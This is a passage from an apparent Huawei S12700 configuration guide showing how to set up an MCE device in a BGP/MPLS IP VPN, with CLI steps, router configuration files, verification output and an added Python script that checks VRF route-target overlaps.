port trunk allow-pass vlan 20
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface LoopBack1
ip address 1.1.1.9 255.255.255.255
#
bgp 100
peer 3.3.3.9 as-number 100
peer 3.3.3.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 3.3.3.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 3.3.3.9 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 10.1.1.1 as-number 65410
#
ipv4-family vpn-instance vpnb
import-route direct
peer 10.2.1.1 as-number 65420
#
ospf 1 router-id 1.1.1.9
area 0.0.0.0
network 1.1.1.9 0.0.0.0
network 172.1.1.0 0.0.0.255
#
return
l Configuration file of P
#
sysname P
#
vlan batch 30 60
#
mpls lsr-id 2.2.2.9
mpls
#
mpls ldp
#
interface Vlanif30
ip address 172.1.1.2 255.255.255.0
mpls
mpls ldp
#
interface Vlanif60
ip address 172.2.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 60
#
interface LoopBack1
ip address 2.2.2.9 255.255.255.255
#
ospf 1 router-id 2.2.2.9
area 0.0.0.0
network 2.2.2.9 0.0.0.0
network 172.1.1.0 0.0.0.255
network 172.2.1.0 0.0.0.255
#
return
l Configuration file of PE2
#
sysname PE2
#
vlan batch 40 50 60
#
ip vpn-instance vpna
ipv4-family
route-distinguisher 200:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 200:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 3.3.3.9
mpls
#
mpls ldp
#
interface Vlanif40
ip binding vpn-instance vpna
ip address 10.3.1.2 255.255.255.0
#
interface Vlanif50
ip binding vpn-instance vpnb
ip address 10.4.1.2 255.255.255.0
#
interface Vlanif60
ip address 172.2.1.2 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 40
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 50
#
interface GigabitEthernet3/0/0
port link-type trunk
port trunk allow-pass vlan 60
#
interface LoopBack1
ip address 3.3.3.9 255.255.255.255
#
bgp 100
peer 1.1.1.9 as-number 100
peer 1.1.1.9 connect-interface LoopBack1
#
ipv4-family unicast
undo synchronization
peer 1.1.1.9 enable
#
ipv4-family vpnv4
policy vpn-target
peer 1.1.1.9 enable
#
ipv4-family vpn-instance vpna
import-route direct
peer 10.3.1.1 as-number 65430
#
ipv4-family vpn-instance vpnb
import-route direct
peer 10.4.1.1 as-number 65440
#
ospf 1 router-id 3.3.3.9
area 0.0.0.0
network 3.3.3.9 0.0.0.0
network 172.2.1.0 0.0.0.255
#
return
l Configuration file of CE1 connecting to the headquarters R&D area
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
bgp 65410
peer 10.1.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.1.1.2 enable
#
return
l Configuration file of CE2 connecting to the headquarters non-R&D area
#
sysname CE2
#
vlan batch 20
#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 20
#
bgp 65420
peer 10.2.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.2.1.2 enable
#
return
l Configuration file of CE3 connecting to the branch R&D area
#
sysname CE3
#
vlan batch 40
#
interface Vlanif40
ip address 10.3.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 40
#
bgp 65430
peer 10.3.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.3.1.2 enable
#
return
l Configuration file of CE4 connecting to the branch non-R&D area
#
sysname CE4
#
vlan batch 50
#
interface Vlanif50
ip address 10.4.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 50
#
bgp 65440
peer 10.4.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.4.1.2 enable
#
return

14.1.2 Example for Configuring an MCE

MCE Overview
A multi-VPN-instance CE (MCE) device can function as a CE device for multiple VPN
instances in BGP/MPLS IP VPN networking. This differs from the traditional BGP/MPLS IP
VPN architecture, where each VPN instance must use a CE device to connect to a PE device.
MCE applies when users on a private network need to be divided into multiple VPNs and
services of users in different VPNs must be completely isolated. Deploying a CE device for
each VPN increases the cost of device procurement and maintenance. If multiple VPNs share
one CE device, data security cannot be ensured because all the VPNs use the same routing
table.
An MCE device creates and maintains an independent VRF for each VPN. This ensures data
security between different VPNs while reducing network construction and maintenance costs.
The Multi-VRF application isolates forwarding paths of different VPNs on a private network
and advertises routes of each VPN to the peer PE device, ensuring that VPN packets are
correctly transmitted on the public network.

Configuration Notes
l This example applies to all versions of the S12700 switches.
NOTE
For details about software mappings, see Switch Software Mapping Search.

Networking Requirements
The headquarters and branches of a company need to communicate through MPLS VPN, and
two services of the company must be isolated. To reduce hardware costs, the company wants
the branch to connect to the PE through one CE.
As shown in Figure 14-2, the networking requirements are as follows:
l CE1 and CE2 connect to the headquarters. CE1 belongs to vpna, and CE2 belongs to
vpnb.
l The MCE connects to vpna and vpnb of the branch through SwitchA and SwitchB.
Users in the same VPN need to communicate with each other, but users in different VPNs
must be isolated.

Figure 14-2 Networking diagram for configuring an MCE
[Figure residue removed. The diagram shows CE1 (vpna) and CE2 (vpnb) at the headquarters connected to PE1 over VLANIF10 and VLANIF20, PE1 and PE2 connected across the VPN backbone over VLANIF30, PE2 connected to the MCE, and the MCE connected to SwitchA (vpna) and SwitchB (vpnb) at the branch. Interface and IP address assignments are given in the procedure and configuration files that follow.]
Configuration Roadmap
The configuration roadmap is as follows:
1. Configure OSPF between PEs so that they can communicate and configure MP-IBGP to
exchange VPN routing information.
2. Configure basic MPLS capabilities and MPLS LDP on the PEs to establish LDP LSPs.
3. Create VPN instances vpna and vpnb on the MCE and PEs to isolate services.
4. Establish EBGP peer relationships between PE1 and its connected CEs, and import BGP
routes to the VPN routing table of PE1.
5. Configure routing between the MCE and VPN sites and between the MCE and PE2.

Procedure
Step 1 Configure VLANs on interfaces and assign IP addresses to the VLANIF interfaces and
loopback interfaces according to Figure 14-2.
# Configure PE1. The configuration on PE2, CE1, CE2, MCE, SwitchA and SwitchB is
similar to the configuration on PE1 and is not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname PE1

[PE1] interface loopback 1
[PE1-LoopBack1] ip address 1.1.1.9 32
[PE1-LoopBack1] quit
[PE1] vlan batch 30
[PE1] interface gigabitethernet 3/0/0
[PE1-GigabitEthernet3/0/0] port link-type trunk
[PE1-GigabitEthernet3/0/0] port trunk allow-pass vlan 30
[PE1-GigabitEthernet3/0/0] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] ip address 172.1.1.1 24
[PE1-Vlanif30] quit

Step 2 Configure OSPF on PEs of the backbone network.


# Configure PE1.
[PE1] ospf
[PE1-ospf-1] area 0
[PE1-ospf-1-area-0.0.0.0] network 1.1.1.9 0.0.0.0
[PE1-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[PE1-ospf-1-area-0.0.0.0] quit
[PE1-ospf-1] quit

# Configure PE2.
[PE2] ospf
[PE2-ospf-1] area 0
[PE2-ospf-1-area-0.0.0.0] network 2.2.2.9 0.0.0.0
[PE2-ospf-1-area-0.0.0.0] network 172.1.1.0 0.0.0.255
[PE2-ospf-1-area-0.0.0.0] quit
[PE2-ospf-1] quit

After the configuration is complete, the PEs learn each other's Loopback1 address.
The information displayed on PE2 is used as an example.
[PE2] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 10 Routes : 10

Destination/Mask Proto Pre Cost Flags NextHop Interface

1.1.1.9/32 OSPF 10 1 D 172.1.1.1 Vlanif30


2.2.2.9/32 Direct 0 0 D 127.0.0.1 LoopBack1
10.3.1.0/24 Direct 0 0 D 10.3.1.3 Vlanif60
10.3.1.3/32 Direct 0 0 D 127.0.0.1 Vlanif60
10.4.1.0/24 Direct 0 0 D 10.4.1.3 Vlanif70
10.4.1.3/32 Direct 0 0 D 127.0.0.1 Vlanif70
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.1.1.0/24 Direct 0 0 D 172.1.1.2 Vlanif30
172.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif30

Step 3 Configure basic MPLS capabilities and MPLS LDP on the PEs to establish LDP LSPs.
# Configure PE1. The configuration on PE2 is similar to the configuration on PE1 and is not
mentioned here.

[PE1] mpls lsr-id 1.1.1.9
[PE1] mpls
[PE1-mpls] quit
[PE1] mpls ldp
[PE1-mpls-ldp] quit
[PE1] interface vlanif 30
[PE1-Vlanif30] mpls
[PE1-Vlanif30] mpls ldp
[PE1-Vlanif30] quit

After the configuration is complete, run the display mpls ldp session command on the PEs.
The command output shows that the MPLS LDP session between the PEs is in Operational
state.

The information displayed on PE2 is used as an example.


[PE2] display mpls ldp session

LDP Session(s) in Public Network
Codes: LAM(Label Advertisement Mode), SsnAge Unit(DDDD:HH:MM)
A '*' before a session means the session is being deleted.
------------------------------------------------------------------------------
PeerID Status LAM SsnRole SsnAge KASent/Rcv
------------------------------------------------------------------------------
1.1.1.9:0 Operational DU Active 0000:00:04 17/17
------------------------------------------------------------------------------
TOTAL: 1 session(s) Found.

Step 4 Configure VPN instances on the PEs. On PE1, bind the interfaces connected to CE1 and CE2
to the VPN instances respectively. On PE2, bind the interface connected to the MCE to the
VPN instances.

# Configure PE1.
[PE1] vlan batch 10 20
[PE1] interface gigabitethernet 1/0/0
[PE1-GigabitEthernet1/0/0] port link-type trunk
[PE1-GigabitEthernet1/0/0] port trunk allow-pass vlan 10
[PE1-GigabitEthernet1/0/0] quit
[PE1] interface gigabitethernet 2/0/0
[PE1-GigabitEthernet2/0/0] port link-type trunk
[PE1-GigabitEthernet2/0/0] port trunk allow-pass vlan 20
[PE1-GigabitEthernet2/0/0] quit
[PE1] ip vpn-instance vpna
[PE1-vpn-instance-vpna] ipv4-family
[PE1-vpn-instance-vpna-af-ipv4] route-distinguisher 100:1 //Set the RD to 100:1.
[PE1-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both //Add the RT value
111:1 to routes exported from the VPN instance vpna to MP-BGP. Only the routes
with the RT value 111:1 can be imported to vpna.
[PE1-vpn-instance-vpna-af-ipv4] quit
[PE1-vpn-instance-vpna] quit
[PE1] ip vpn-instance vpnb
[PE1-vpn-instance-vpnb] ipv4-family
[PE1-vpn-instance-vpnb-af-ipv4] route-distinguisher 100:2
[PE1-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE1-vpn-instance-vpnb-af-ipv4] quit
[PE1-vpn-instance-vpnb] quit
[PE1] interface vlanif 10
[PE1-Vlanif10] ip binding vpn-instance vpna //Bind the interface to vpna.
[PE1-Vlanif10] ip address 10.1.1.2 24
[PE1-Vlanif10] quit
[PE1] interface vlanif 20
[PE1-Vlanif20] ip binding vpn-instance vpnb
[PE1-Vlanif20] ip address 10.2.1.2 24
[PE1-Vlanif20] quit

# Configure PE2.
[PE2] vlan batch 60 70
[PE2] interface gigabitethernet 2/0/0
[PE2-GigabitEthernet2/0/0] port link-type trunk
[PE2-GigabitEthernet2/0/0] port trunk allow-pass vlan 60 70
[PE2-GigabitEthernet2/0/0] quit
[PE2] ip vpn-instance vpna
[PE2-vpn-instance-vpna] ipv4-family
[PE2-vpn-instance-vpna-af-ipv4] route-distinguisher 200:1
[PE2-vpn-instance-vpna-af-ipv4] vpn-target 111:1 both
[PE2-vpn-instance-vpna-af-ipv4] quit

[PE2-vpn-instance-vpna] quit
[PE2] ip vpn-instance vpnb
[PE2-vpn-instance-vpnb] ipv4-family
[PE2-vpn-instance-vpnb-af-ipv4] route-distinguisher 200:2
[PE2-vpn-instance-vpnb-af-ipv4] vpn-target 222:2 both
[PE2-vpn-instance-vpnb-af-ipv4] quit
[PE2-vpn-instance-vpnb] quit
[PE2] interface vlanif 60
[PE2-Vlanif60] ip binding vpn-instance vpna
[PE2-Vlanif60] ip address 10.3.1.3 24
[PE2-Vlanif60] quit
[PE2] interface vlanif 70
[PE2-Vlanif70] ip binding vpn-instance vpnb
[PE2-Vlanif70] ip address 10.4.1.3 24
[PE2-Vlanif70] quit

Step 5 Configure VPN instances on the MCE and bind the interfaces connected to SwitchA and
SwitchB to the VPN instances respectively.
<HUAWEI> system-view
[HUAWEI] sysname MCE
[MCE] vlan batch 60 70
[MCE] interface gigabitethernet 1/0/0
[MCE-GigabitEthernet1/0/0] port link-type trunk
[MCE-GigabitEthernet1/0/0] port trunk allow-pass vlan 60 70
[MCE-GigabitEthernet1/0/0] quit
[MCE] interface gigabitethernet 3/0/0
[MCE-GigabitEthernet3/0/0] port link-type trunk
[MCE-GigabitEthernet3/0/0] port trunk allow-pass vlan 60
[MCE-GigabitEthernet3/0/0] quit
[MCE] interface gigabitethernet 4/0/0
[MCE-GigabitEthernet4/0/0] port link-type trunk
[MCE-GigabitEthernet4/0/0] port trunk allow-pass vlan 70
[MCE-GigabitEthernet4/0/0] quit
[MCE] ip vpn-instance vpna
[MCE-vpn-instance-vpna] ipv4-family
[MCE-vpn-instance-vpna-af-ipv4] route-distinguisher 100:1
[MCE-vpn-instance-vpna-af-ipv4] quit
[MCE-vpn-instance-vpna] quit
[MCE] ip vpn-instance vpnb
[MCE-vpn-instance-vpnb] ipv4-family
[MCE-vpn-instance-vpnb-af-ipv4] route-distinguisher 100:2
[MCE-vpn-instance-vpnb-af-ipv4] quit
[MCE-vpn-instance-vpnb] quit
[MCE] interface vlanif 60
[MCE-Vlanif60] ip binding vpn-instance vpna
[MCE-Vlanif60] ip address 10.3.1.2 24
[MCE-Vlanif60] quit
[MCE] interface vlanif 70
[MCE-Vlanif70] ip binding vpn-instance vpnb
[MCE-Vlanif70] ip address 10.4.1.2 24
[MCE-Vlanif70] quit

Step 6 Establish an MP-IBGP peer relationship between PEs. Establish an EBGP peer relationship
between PE1 and CE1, and between PE1 and CE2.
# Configure CE1. The configuration on CE2 is similar to the configuration on CE1 and is not
mentioned here.
[CE1] bgp 65410
[CE1-bgp] peer 10.1.1.2 as-number 100 //Establish an EBGP peer relationship
between PE1 and CE1 and import VPN routes.
[CE1-bgp] import-route direct
[CE1-bgp] quit

# Configure PE1. The configuration on PE2 is similar to the configuration on PE1 and is not
mentioned here.
[PE1] bgp 100
[PE1-bgp] ipv4-family vpn-instance vpna

[PE1-bgp-vpna] peer 10.1.1.1 as-number 65410
[PE1-bgp-vpna] import-route direct
[PE1-bgp-vpna] quit
[PE1-bgp] ipv4-family vpn-instance vpnb
[PE1-bgp-vpnb] peer 10.2.1.1 as-number 65420
[PE1-bgp-vpnb] import-route direct
[PE1-bgp-vpnb] quit
[PE1-bgp] quit

Set up an MP-IBGP peer relationship between the PE devices.


# Configure PE1. The configuration on PE2 is similar to the configuration on PE1 and is not
mentioned here.
[PE1] bgp 100
[PE1-bgp] peer 2.2.2.9 as-number 100
[PE1-bgp] peer 2.2.2.9 connect-interface loopback 1
[PE1-bgp] ipv4-family vpnv4
[PE1-bgp-af-vpnv4] peer 2.2.2.9 enable
[PE1-bgp-af-vpnv4] quit
[PE1-bgp] quit

After the configuration is complete, run the display bgp vpnv4 all peer command on PE1.
The command output shows that PE1 has established an IBGP peer relationship with PE2 and
EBGP peer relationships with CE1 and CE2. The peer relationships are in Established state.
[PE1] display bgp vpnv4 all peer

BGP local router ID : 1.1.1.9
Local AS number : 100
Total number of peers : 3 Peers in established state : 3

Peer V AS MsgRcvd MsgSent OutQ Up/Down State PrefRcv

2.2.2.9 4 100 288 287 0 01:19:16 Established 6

Peer of IPv4-family for vpn instance :

VPN-Instance vpna, Router ID 1.1.1.9:
10.1.1.1 4 65410 9 11 0 00:01:38 Established 2

VPN-Instance vpnb, Router ID 1.1.1.9:
10.2.1.1 4 65420 9 12 0 00:04:09 Established 2

Step 7 Configure routing between the MCE and VPN sites.


The MCE directly connects to vpna, and no routing protocol is used in vpna. Configure static
routes to implement communication between the MCE and vpna.
l # Configure SwitchA.
Assign IP address 192.168.1.1/24 to the interface connected to vpna. The configuration
details are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 60
[SwitchA] interface gigabitethernet 1/0/0
[SwitchA-GigabitEthernet1/0/0] port link-type trunk
[SwitchA-GigabitEthernet1/0/0] port trunk allow-pass vlan 60
[SwitchA-GigabitEthernet1/0/0] quit
[SwitchA] interface vlanif 60
[SwitchA-Vlanif60] ip address 10.3.1.1 24
[SwitchA-Vlanif60] quit
[SwitchA] ip route-static 0.0.0.0 0.0.0.0 10.3.1.2 //Create a default route
destined to the MCE for SwitchA.

l # Configure the MCE.

[MCE] ip route-static vpn-instance vpna 192.168.1.0 24 10.3.1.1 //Create a
VPN route destined to SwitchA for the VPN instance vpna.

l # Check the routes of vpna on the MCE.


[MCE] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpna
Destinations : 3 Routes : 3

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.3.1.0/24 Direct 0 0 D 10.3.1.2 Vlanif60
10.3.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif60
192.168.1.0/24 Static 60 0 RD 10.3.1.1 Vlanif60
The preceding information shows that the MCE has a static route to vpna.

The RIP protocol runs in vpnb. Configure RIP process 200 on the MCE and bind it to vpnb so
that routes learned by RIP are added to the routing table of vpnb.

l # Configure the MCE.


[MCE] rip 200 vpn-instance vpnb
[MCE-rip-200] version 2
[MCE-rip-200] network 10.0.0.0
[MCE-rip-200] import-route ospf 200 //Import the routes learned by OSPF process
200 (configured in Step 8) into RIP so that SwitchB learns routes to the remote
vpnb site through the MCE.
[MCE-rip-200] quit

l # Configure SwitchB.
Assign IP address 192.168.2.1/24 to the interface connected to vpnb. The configuration
is not provided here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 70
[SwitchB] interface gigabitethernet 1/0/0
[SwitchB-GigabitEthernet1/0/0] port link-type trunk
[SwitchB-GigabitEthernet1/0/0] port trunk allow-pass vlan 70
[SwitchB-GigabitEthernet1/0/0] quit
[SwitchB] interface vlanif 70
[SwitchB-Vlanif70] ip address 10.4.1.1 24
[SwitchB-Vlanif70] quit
[SwitchB] rip 200
[SwitchB-rip-200] version 2
[SwitchB-rip-200] network 10.0.0.0
[SwitchB-rip-200] network 192.168.2.0
[SwitchB-rip-200] quit

l # Check the routes of vpnb on the MCE.


[MCE] display ip routing-table vpn-instance vpnb
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpnb
Destinations : 3 Routes :

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.4.1.0/24 Direct 0 0 D 10.4.1.2 Vlanif70
10.4.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif70
192.168.2.0/24 RIP 100 1 D 10.4.1.1 Vlanif70
The preceding information shows that the MCE has learned the route to vpnb using RIP.
The route to vpnb and the route to vpna (192.168.1.0) are maintained in different VPN
routing tables so that users in the two VPNs are isolated from each other.
Step 8 Configure OSPF multi-instance between the MCE and PE2.
# Configure PE2.
NOTE

To configure OSPF multi-instance between the MCE and PE2, complete the following tasks on PE2:
l In the OSPF view, import BGP routes and advertise VPN routes of PE1 to the MCE.
l In the BGP view, import routes of the OSPF processes and advertise the VPN routes of the MCE
to PE1.
[PE2] ospf 100 vpn-instance vpna
[PE2-ospf-100] import-route bgp //Import BGP routes to OSPF 100 in vpna between
the PE and MCE, so that the MCE learns routes to CE1.
[PE2-ospf-100] area 0
[PE2-ospf-100-area-0.0.0.0] network 10.3.1.0 0.0.0.255
[PE2-ospf-100-area-0.0.0.0] quit
[PE2-ospf-100] quit
[PE2] ospf 200 vpn-instance vpnb
[PE2-ospf-200] import-route bgp //Import BGP routes to OSPF 200 in vpnb between
the PE and MCE, so that the MCE learns routes to CE2.
[PE2-ospf-200] area 0
[PE2-ospf-200-area-0.0.0.0] network 10.4.1.0 0.0.0.255
[PE2-ospf-200-area-0.0.0.0] quit
[PE2-ospf-200] quit
[PE2] bgp 100
[PE2-bgp] ipv4-family vpn-instance vpna
[PE2-bgp-vpna] import-route ospf 100 //Import OSPF 100 to BGP so that PE2 adds
the VPNv4 prefix to routes and uses MP-iBGP to advertise routes to PE1.
[PE2-bgp-vpna] quit
[PE2-bgp] ipv4-family vpn-instance vpnb
[PE2-bgp-vpnb] import-route ospf 200 //Import OSPF 200 to BGP so that PE2 adds
the VPNv4 prefix to routes and uses MP-iBGP to advertise routes to PE1.
[PE2-bgp-vpnb] quit

# Configure the MCE.


NOTE

Import VPN routes to the OSPF processes.


[MCE] ospf 100 vpn-instance vpna //Configure dynamic OSPF routes for
the VPN instance vpna.
[MCE-ospf-100] import-route static //Import static private routes of
SwitchA to the MCE.
[MCE-ospf-100] vpn-instance-capability simple //Disable loop detection for OSPF
VPN, so that the MCE can learn routes re-advertised from PE2.
[MCE-ospf-100] area 0
[MCE-ospf-100-area-0.0.0.0] network 10.3.1.0 0.0.0.255
[MCE-ospf-100-area-0.0.0.0] quit
[MCE-ospf-100] quit
[MCE] ospf 200 vpn-instance vpnb

[MCE-ospf-200] import-route rip 200
[MCE-ospf-200] vpn-instance-capability simple
[MCE-ospf-200] area 0
[MCE-ospf-200-area-0.0.0.0] network 10.4.1.0 0.0.0.255
[MCE-ospf-200-area-0.0.0.0] quit
[MCE-ospf-200] quit

Step 9 Verify the configuration.

After the configuration is complete, run the display ip routing-table vpn-instance command
on the MCE to view the routes to the remote CEs.

The VPN instance vpna is used as an example.


[MCE] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpna
Destinations : 4 Routes : 4

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 O_ASE 150 1 D 10.3.1.3 Vlanif60
10.3.1.0/24 Direct 0 0 D 10.3.1.2 Vlanif60
10.3.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif60
192.168.1.0/24 Static 60 0 RD 10.3.1.1 Vlanif60

Run the display ip routing-table vpn-instance command on the PEs to view the routes to the
remote CEs.

The VPN instance vpna on PE1 is used as an example.


[PE1] display ip routing-table vpn-instance vpna
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: vpna
Destinations : 4 Routes : 4

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 Direct 0 0 D 10.1.1.2 Vlanif10
10.1.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.3.1.0/24 IBGP 255 0 RD 2.2.2.9 Vlanif30
192.168.1.0/24 IBGP 255 2 RD 2.2.2.9 Vlanif30

CE1 and SwitchA can communicate with each other. CE2 and SwitchB can communicate
with each other.

The information displayed on CE1 is used as an example.


[CE1] ping 10.3.1.1
PING 10.3.1.1: 56 data bytes, press CTRL_C to break
Reply from 10.3.1.1: bytes=56 Sequence=1 ttl=252 time=3 ms
Reply from 10.3.1.1: bytes=56 Sequence=2 ttl=252 time=3 ms
Reply from 10.3.1.1: bytes=56 Sequence=3 ttl=252 time=3 ms
Reply from 10.3.1.1: bytes=56 Sequence=4 ttl=252 time=3 ms
Reply from 10.3.1.1: bytes=56 Sequence=5 ttl=252 time=11 ms

--- 10.3.1.1 ping statistics ---


5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 3/4/11 ms

CE1 cannot ping CE2 or SwitchB. SwitchA cannot ping CE2 or SwitchB.

The ping from CE1 to SwitchB is used as an example.

[CE1] ping 10.4.1.1
PING 10.4.1.1: 56 data bytes, press CTRL_C to break
Request time out
Request time out
Request time out
Request time out
Request time out

--- 10.4.1.1 ping statistics ---


5 packet(s) transmitted
0 packet(s) received
100.00% packet loss

----End
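The isolation shown by the two ping results above holds only while the vpn-target (RT) policies of vpna and vpnb stay disjoint; a single extra import RT on a PE would merge the two VRF tables. The following added Python script (not Huawei code and not part of this document) parses the ip vpn-instance / vpn-target / ip binding vpn-instance lines in the file format used in the Configuration Files section, simulates the RT-based import a PE performs, and flags overlapping RTs. The PE2 configuration text it embeds is taken from this example; the "leaky" variant and the list of routes advertised by PE1 are constructed for the demonstration.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Vrf:
    name: str
    rd: str = ""
    export_rt: set = field(default_factory=set)
    import_rt: set = field(default_factory=set)
    interfaces: list = field(default_factory=list)


def parse_vrfs(config: str) -> dict:
    """Extract VPN instances (RD, RTs) and bound interfaces from a VRP-style config."""
    vrfs, cur_vrf, cur_if = {}, None, None
    for raw in config.splitlines():
        line = raw.strip()
        if line == "#":  # section separator: drop any context
            cur_vrf = cur_if = None
        elif m := re.fullmatch(r"ip vpn-instance (\S+)", line):
            cur_vrf = vrfs.setdefault(m[1], Vrf(m[1]))
        elif m := re.fullmatch(r"interface (\S+)", line):
            cur_if = m[1]
        elif cur_vrf and (m := re.fullmatch(r"route-distinguisher (\S+)", line)):
            cur_vrf.rd = m[1]
        elif cur_vrf and (m := re.fullmatch(
                r"vpn-target (\S+) (export-extcommunity|import-extcommunity|both)", line)):
            # The procedure types "both"; the saved file shows two one-direction lines.
            if m[2] != "import-extcommunity":
                cur_vrf.export_rt.add(m[1])
            if m[2] != "export-extcommunity":
                cur_vrf.import_rt.add(m[1])
        elif cur_if and (m := re.fullmatch(r"ip binding vpn-instance (\S+)", line)):
            vrfs.setdefault(m[1], Vrf(m[1])).interfaces.append(cur_if)
    return vrfs


def import_routes(vrfs: dict, vpnv4_routes: list) -> dict:
    """Simulate MP-BGP import on a PE: a VPNv4 route enters every VRF whose
    import RTs intersect the RTs the route carries ('policy vpn-target')."""
    tables = {name: set() for name in vrfs}
    for prefix, rts in vpnv4_routes:
        for name, vrf in vrfs.items():
            if vrf.import_rt & rts:
                tables[name].add(prefix)
    return tables


def find_rt_leaks(vrfs: dict) -> list:
    """Report VRF pairs whose RTs overlap: one would import the other's routes."""
    leaks, names = [], sorted(vrfs)
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            shared = (vrfs[a].import_rt & vrfs[b].export_rt) | (vrfs[b].import_rt & vrfs[a].export_rt)
            if shared:
                leaks.append((a, b, sorted(shared)))
    return leaks


# VPN-related part of the PE2 configuration file from this example.
PE2_CONFIG = """\
#
ip vpn-instance vpna
 ipv4-family
  route-distinguisher 200:1
  vpn-target 111:1 export-extcommunity
  vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
 ipv4-family
  route-distinguisher 200:2
  vpn-target 222:2 export-extcommunity
  vpn-target 222:2 import-extcommunity
#
interface Vlanif60
 ip binding vpn-instance vpna
 ip address 10.3.1.3 255.255.255.0
#
interface Vlanif70
 ip binding vpn-instance vpnb
 ip address 10.4.1.3 255.255.255.0
#
"""

# Constructed misconfiguration: vpnb additionally imports vpna's RT.
LEAKY_CONFIG = PE2_CONFIG.replace(
    "  vpn-target 222:2 import-extcommunity",
    "  vpn-target 222:2 import-extcommunity\n  vpn-target 111:1 import-extcommunity")

# VPNv4 routes PE1 advertises in this example, tagged with the export RT of
# the VRF they came from (CE1's link is in vpna, CE2's link is in vpnb).
PE1_ADVERTISED = [("10.1.1.0/24", {"111:1"}), ("10.2.1.0/24", {"222:2"})]


def audit(config: str) -> dict:
    """Simulated per-VRF tables plus RT overlaps for one PE configuration."""
    vrfs = parse_vrfs(config)
    return {"tables": import_routes(vrfs, PE1_ADVERTISED), "leaks": find_rt_leaks(vrfs)}


if __name__ == "__main__":
    print("as configured:", audit(PE2_CONFIG))
    print("with extra import RT:", audit(LEAKY_CONFIG))
```

With the configuration as written, vpna holds only 10.1.1.0/24 and vpnb only 10.2.1.0/24; with the extra import RT, 10.1.1.0/24 also appears in vpnb and the overlap on 111:1 is reported.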

Configuration Files
l Configuration file of CE1
#
sysname CE1
#
vlan batch 10
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
bgp 65410
peer 10.1.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.1.1.2 enable
#
return

l Configuration file of CE2


#
sysname CE2
#
vlan batch 20
#
interface Vlanif20
ip address 10.2.1.1 255.255.255.0
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 20
#
bgp 65420
peer 10.2.1.2 as-number 100
#
ipv4-family unicast
undo synchronization
import-route direct
peer 10.2.1.2 enable
#
return

l Configuration file of PE1


#
sysname PE1
#
vlan batch 10 20 30

#
ip vpn-instance vpna
ipv4-family
route-distinguisher 100:1
vpn-target 111:1 export-extcommunity
vpn-target 111:1 import-extcommunity
#
ip vpn-instance vpnb
ipv4-family
route-distinguisher 100:2
vpn-target 222:2 export-extcommunity
vpn-target 222:2 import-extcommunity
#
mpls lsr-id 1.1.1.9
mpls
#
mpls ldp
#
interface Vlanif10
ip binding vpn-instance vpna
ip address 10.1.1.2 255.255.255.0
#
interface Vlanif20
ip binding vpn-instance vpnb
ip address 10.2.1.2 255.255.255.0
#
interface Vlanif30
ip address 172.1.1.1 255.255.255.0
mpls
mpls ldp
#
interface GigabitEthernet1/0/0
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet2/0/0
